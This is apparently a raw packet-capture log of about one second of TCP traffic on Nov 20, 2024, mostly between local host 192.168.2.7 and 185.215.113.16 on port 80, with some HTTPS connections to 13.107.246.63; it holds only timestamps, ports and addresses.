                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.107635975 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.109402895 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.109664917 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.109708071 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.111365080 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.111588001 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.111628056 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.113374949 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.113890886 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.113934994 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.115320921 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.115437984 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.115483046 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.117269039 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.117415905 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.117459059 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.119260073 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.119463921 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.119508028 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.121248007 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.121315956 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.121359110 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.123214006 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.123430014 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.123473883 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.125310898 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.125386000 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.125431061 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.127268076 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.127459049 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.127502918 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.129348993 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.129508972 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.129550934 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.131225109 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.131572962 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.131616116 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.133174896 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.133730888 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.133776903 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.135152102 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.135194063 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.135235071 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.137093067 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.137331009 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.137372971 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.139115095 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.139620066 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.139664888 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.141123056 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.141824007 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.141868114 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.143157005 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.143321991 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.143362999 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.145098925 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.145292044 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.145334005 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.147030115 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.147384882 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.147433996 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.149003029 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.149338007 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.149384022 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.150974035 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.151138067 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.151180983 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.153002024 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.153142929 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.153184891 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.173652887 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.173713923 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.173773050 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.173959017 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.173978090 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.173990965 CET49760443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.173998117 CET4434976013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.175849915 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.175865889 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.175991058 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.176033974 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.176044941 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.188889027 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.188936949 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.188982964 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.189620018 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.189627886 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.189640999 CET49762443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.189646006 CET4434976213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.193450928 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.193471909 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.193530083 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.193702936 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.193720102 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.249062061 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.249119997 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.249170065 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.250016928 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.250072002 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.250113010 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.251957893 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.252052069 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.252096891 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.253880978 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.253964901 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.254008055 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.255861044 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.255922079 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.255965948 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.257878065 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.257957935 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.258002043 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.259816885 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.260106087 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.260149002 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.261950016 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.262048006 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.262090921 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.263793945 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.263880968 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.263926029 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.265758991 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.265947104 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.265986919 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.267757893 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.267976999 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.268022060 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.269711971 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.269804955 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.269846916 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.271898031 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.271954060 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.271996975 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.273121119 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.273205996 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.273247957 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.274741888 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.274854898 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.274895906 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.275635004 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.275722980 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.275789022 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.275994062 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.276038885 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.276071072 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.276087046 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.276458025 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.276478052 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.276524067 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.278027058 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.278135061 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.278187990 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.279443026 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.279493093 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.279561996 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.279664040 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.279752016 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.279762983 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.280131102 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.280174017 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.281296968 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.281686068 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.281727076 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.282989979 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.283118010 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.283164978 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.284662008 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.284773111 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.284813881 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.286369085 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.286581039 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.286623001 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.287993908 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.288044930 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.288085938 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.289622068 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.289916992 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.289963007 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.291374922 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.291621923 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.291666985 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.292892933 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.293462992 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.293504953 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.294565916 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.295245886 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.295293093 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.296219110 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.296603918 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.296643972 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.297939062 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.298408031 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.298449039 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.299526930 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.299685955 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.299730062 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.301166058 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.301677942 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.301719904 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.303375959 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.303575039 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.303616047 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.304852962 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.305027962 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.305069923 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.306144953 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.306294918 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.306334972 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.307809114 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.308008909 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.308049917 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.309442997 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.309535027 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.309576035 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.311110020 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.311475039 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.311513901 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.312809944 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.312829971 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.312870979 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.314409018 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.314527988 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.314570904 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.316077948 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.316448927 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.316493034 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.317709923 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.318049908 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.318090916 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.319417000 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.319869041 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.319914103 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.321075916 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.321152925 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.321193933 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.322751045 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.322822094 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.323107004 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.324377060 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.324912071 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.324959040 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.326014042 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.326057911 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.326102018 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.327645063 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.327796936 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.327836037 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.329320908 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.329998970 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.330043077 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.331125975 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.331825018 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.331866980 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.332700014 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.332940102 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.332979918 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.334279060 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.335076094 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.335118055 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.335994959 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.336074114 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.336116076 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.440772057 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.441019058 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.441090107 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.441528082 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.441540956 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.441593885 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.442565918 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.442755938 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.442811012 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.444005966 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.444169998 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.444215059 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.445400000 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.446048975 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.446099043 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:45.446788073 CET8049758185.215.113.16192.168.2.7
